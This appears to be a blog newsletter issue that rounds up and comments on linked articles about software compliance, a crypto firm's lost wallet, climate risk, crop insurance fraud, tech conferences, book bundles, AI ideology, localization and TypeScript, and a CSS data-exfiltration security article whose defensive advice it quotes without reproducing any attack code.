You don’t have to read it, but you just might learn something.
Leading Thought
Prime
Compliance & Regulatory Standards Are Not Incompatible with Modern Development Best Practices
I’ve been arguing this for a long time, though not as eloquently as Charity Majors in this Twitter thread about a presentation she did recently in Austin, TX. If you are in an environment that has regulatory standards (e.g., SOx) and you think that means you can’t have nice things including no gated check-ins and no required two reviews in GitHub, among other things because compliance, then this is a must-read thread.
As Charity points out, most of these regulations mean one thing: have a process, follow it, and be able to prove you followed it so that you can prove you are protecting your codebase from bad actors, and that you are protecting your customers. It’s probably pretty obvious why, but most of these regulations are not prescriptive (or, at least, not at any level of significance) because it would be near-impossible to dictate standards across vast swaths of varying industries.
Most of the pain we suffer is based on our organization’s interpretations of these regulations, and much of this is self-inflicted. Why? Because engineering is rarely involved in the discussions about how to meet the standards. Why this is the case may vary, from siloed groups making these types of decisions, to an aversion to getting involved in compliance, among others. The reality is that we can have nice things, tighten up the feedback loops, and do better, all while complying with regulations that I think most people agree are good guard rails.
If you’re thinking about it from a finance perspective, it makes TOTAL SENSE to have all these audit logs, or for a supervisor to manually sign off at every stage. That’s how you build accountability into the system.
The way you build accountability into software is different.
The way you build accountability into software is by designing it into the > architecture of your CI/CD pipeline, and pairing on code reviews.
It’s in your checksums, your fingerprints, your static application security testing… your auditable, replayable software pipeline.
‘The Wallet Event’: Crypto Startup Bankrupt After Losing Password to $38.9 Million Physical Crypto Wallet
Imagine you’re an individual with a crypto wallet and you lose access to a lot of money. That’s pretty terrible, but you (hopefully) have damaged your own finances. Now imagine putting your money with another company who then loses access and impacts a lot of people, including their own employees, forcing them into bankruptcy. And, to top it off, they have also been robbing Peter to pay Paul rather that come clean about the problem.
While this story may be unusual for a company, the number of people who have lost their money either by tossing a hard drive, tossing a thumb drive, or simply being unable to remember the pass code should make everyone stop and think twice about the value of decentralized money. The things that make it attractive to some – especially criminals – also makes it an extreme risk. Say what you want about a traditional bank with nation backed currency, but you don’t generally hear a story about someone losing their PIN and then never being able to get access to their account again.
A large problem, among more run-of-the-mill crypto economy problems such as “lack of operational and spending oversight” and “regulatory issues,” is the fact that it lost access to a physical wallet it was keeping a tens of millions of dollars in, and cannot get back into it.
Looking for a US ‘climate haven’ away from heat and disaster risks? Good luck finding one
Whether you believe in climate change or not, this is an interesting article not as much about what the change may look like, but about the ability of havens to handle the changes. From roads not constructed with rising temperatures in mind and buckling, to storm and water infrastructure that can’t support increasing storm intensity, there are a lot of aspects that most probably aren’t considering.
While there are places that may fare better – that is, older cities in the north that have seen populations diminish – no one will go untouched. From more intense storms in the upper midwest, to heavier snowfall an following floods from melt, it seems that the challenges are many and readiness is spotty at best. Definitely worth a read to add more information to your arsenal and prepare as you see fit.
There are a number of innovative ways that cities can fund infrastructure projects, such as public-private partnerships and green banks that help support sustainability projects. DC Green Bank in Washington, D.C., for example, works with private companies to mobilize funding for natural stormwater management projects and energy efficiency.
Tobacco Country’s Dirtiest Open Secret
If you ever need a good example of the unintended side-effects of trying to do something good, and motivating people to do wrong, this is one for sure. Apparently there is a well-known practice in farming – not just tobacco – whereby farmers will deliberately under plant, under maintain, or simply outright not plant a crop at all, in order to file a claim for insurance. Because the insurance is both subsidized and backed by the federal government, there is a belief that it really isn’t harming anyone.
But, of course, this doesn’t happen in a vacuum. Like any well-run scam, there are actors collaborating at every level – consciously or un – from the insurers, to the adjusters, to the companies that buy crops like tobacco for a song. While there are theoretical controls in place such as adjusters not being able to work for the insurance companies, the reality is that many of the players are from the same areas and have known each other for long periods, say having gone to school together, and rely on those relationships for collusion.
Definitely worth a read.
For those reasons, it’s Henton’s belief that the responsibility isn’t with any individual component of the crop insurance scam, but rather a symptom of the whole machine. “The entire thing needs to be shaken to the core,” he says. “There’s lots of players in this thing. And when you get to pointing — whose fault is it, who’s going to fix it? — you find yourself pointing in 15 different directions at once.”
Coming Soon
C# Corner Annual Conference 2023
(October 09-14 | Delhi NCR)
While this conference is in India (not sure if there will be a virtual option or not), I wanted to bring attention to it because this kid I used to work with, Joe Guadagno, will be speaking here. If you are a c# Dev and are going to be in India, or know someone in India who is a C# Dev, give this look. If a virtual option comes up, I’ll update the link.
KubeCon + CloudNativeCon North America 2023
(November 6 – 9 | Chicago, IL and Virtual)
If Cloud, Open Source, and Kubernetes are your thing, then this is a con for you. If you’re attend, make sure you keep an eye out for David Giard, a wonderful individual!
Humble Bundles
Microsoft Press Exam Ref Certification MEGA Book Bundle
New offering from Humble Bundle benefitting Women Who Code – and, if you don’t know it’s there, there is an Adjust Donation button that will let you give more of the take to charity! For a minimum donation of $25 you get 20 titles, including:
- Exam Ref SC-100 Microsoft Cybersecurity Architect
- Exam Ref AZ-900 Microsoft Azure Fundamentals 3rd Edition
- Exam Ref AZ-500 Microsoft Azure Security Technologies 2nd Edition
- Exam Ref SC-900 Microsoft Security, Compliance, and Identity Fundamentals
- Exam Ref SC-200 Microsoft Security Operations Analyst
- And more!
Machine Learning and AI 2023 Book Bundle
New offering from Humble Bundle benefitting Direct Relief – and, if you don’t know it’s there, there is an Adjust Donation button that will let you give more of the take to charity! For a minimum donation of $18 you get 25 titles, including:
- Machine Learning Security Principles
- Artificial Intelligence with Python - Second Edition
- Machine Learning in Microservices
- Creators of Intelligence
- Applied Machine Learning and High-Performance Computing on AWS
- And more!
Game Coding 2023
New offering from Humble Bundle benefitting Direct Relief – and, if you don’t know it’s there, there is an Adjust Donation button that will let you give more of the take to charity! For a minimum donation of $18 you get 19 titles, including:
- How to Make a Game
- GameMaker Fundamentals
- Build Your Own 2D Game Engine and Create Great Web Games
- Exploring Game Mechanics
- Building Multiplayer Games in Unity
- And more!
Project Managers Toolkit Software Bundle
New offering from Humble Bundle benefitting Alzheimers Research UK – and, if you don’t know it’s there, there is an Adjust Donation button that will let you give more of the take to charity! For a minimum donation of $25 you get 30 Pluralsight courses, including:
- Product Management Crash Course and Trello Fundamentals
- Kanban for Software Project Management
- Agile Retrospective: Continuous Improvement and Kaizen with Scrum
- Lean Management: Just-In-Time Training and Certification
- The Complete Project Management Fundamentals Course
- And more!
AI
‘Before It’s Too Late, Buddy’
If there was such a number, what might be the right number of people to sacrifice to a better future for humanity as a whole? The mere fact that a serious answer to this has been given at around 8 billion – or most of the population – should make the TESCREAL movement worthy of observation. In a past issue, I linked an article about the various subgroups that make up TESCREAL – transhumanism, extropianism, singularitarianism, cosmism, rationalism, effective altruism and longtermism – and the extreme views they hold in the name of humanity spreading throughout the universe in the distant future; this article should be a warning as to how dangerous they could actually be.
A normal cult could simply be dismissed because cults, by their very nature, are usually small groups. But what happens hen that small group is made up of some of the richest and most powerful people in the world? Those who have the money and influence to potentially bring some of their vision to life? This is the danger of TESCREAL. No matter which side of the AI/AGI camp you fall into, this is worth read to understand the threat posed by a handful of extremis thinkers who would willing sacrifice most of humanity if it meant the merest chance that we might someday populate the universe.
The threats that I’ve received, the worries expressed by Knutsson, and the fact that TESCREALists themselves feel the need to hide their identities further bolsters my claim that this movement is dangerous. It operates like a cult, has “charismatic” leaders like Yudkowsky and Bostrom, and appears to be increasingly at ease with extreme rhetoric about how to stop the AGI apocalypse.
DE&I
The Micropedia
Important project here to catalog and raise awareness about microagressions. In addition to providing examples across different groups (e.g., age, race, gender), there are tips on how to avoid microagressions, respond to them, and how to be accountable for microagressions you may have committed.
Take a moment to breathe. Everyone has caused a microaggression at some point and it’s never an easy situation.
- Don’t ignore what’s happened
- Listen to what the person you’ve hurt has to say
- Offer a genuine apology without making excuses
Engineering
Structured ASP.NET Localization
Nice overview with example code of how to achieve localization in an ASP.Net app. The author includes examples of resource files, dependency injection, as well as a link to a GitHub repo with the sample code. If you need to provide your site in multiple languages, this may help kickstart your dev.
Array <T> vs T[]: Which is better?
Nice writeup here about the two ways to create and use arrays in TypeScript. Maybe you think they are completely equal (spoiler, they are almost equal). Maybe you don’t really care which form is used. The big takeaway here is pick one and stick with it – linting can pick this up, and your future self will thank you for being consistent.
Infosec
Stealing Data With CSS: Attack and Defense
As I’m diving deeper into modern front-end, I came across this article about a security vulnerability via CSS which I don’t think I would have ever considered a vulnerability. The article includes some proof-of-concept code for data exfiltration via CSS, as well as how to help mitigate the attack vector. Definitely worth a read if this isn’t already on your radar since knowledge is power.
The best defense for website operators is to use a Content Security Policy (CSP) as part of your configuration. Fixing code injection flaws and using a Web Application Firewall can help, but there are still classes of CSS Exfil attacks that may still be affective against your website and which are outside an operator’s direct control (like malicious browser extensions or code injection through advertisements). By adding a CSP, it will limit the ability for an attacker to make calls to the remote URL’s used to siphon data or include a rouge CSS document.
US tech firms offer data protections for Europeans to comply with EU big tech rules
Once again, Europe is leading the way on protecting it’s citizens from harmful practices used by big tech/social media companies like Facebook, TikTok and Twitter (I still can’t bring myself to refer to it as anything else). The new rules include holding companies liable for promoting hate speech, using deceptive patterns and opening up how the algorithms work, and also prevents targeted ads based on a user’s sensitive data.
While it would be nice to see tech companies bring the changes that meet the most stringent of rules to everyone, the reality is that most live and die from advertising revenue and are therefore motivated to only comply where required. Given the current state of the US government, it is hard to imagine that we could be anywhere close to these types of protections being mandated.
The changes come in stark contrast to unsuccessful legislative pushes in the U.S. to ban tech companies from using sensitive and children’s data for targeted advertising.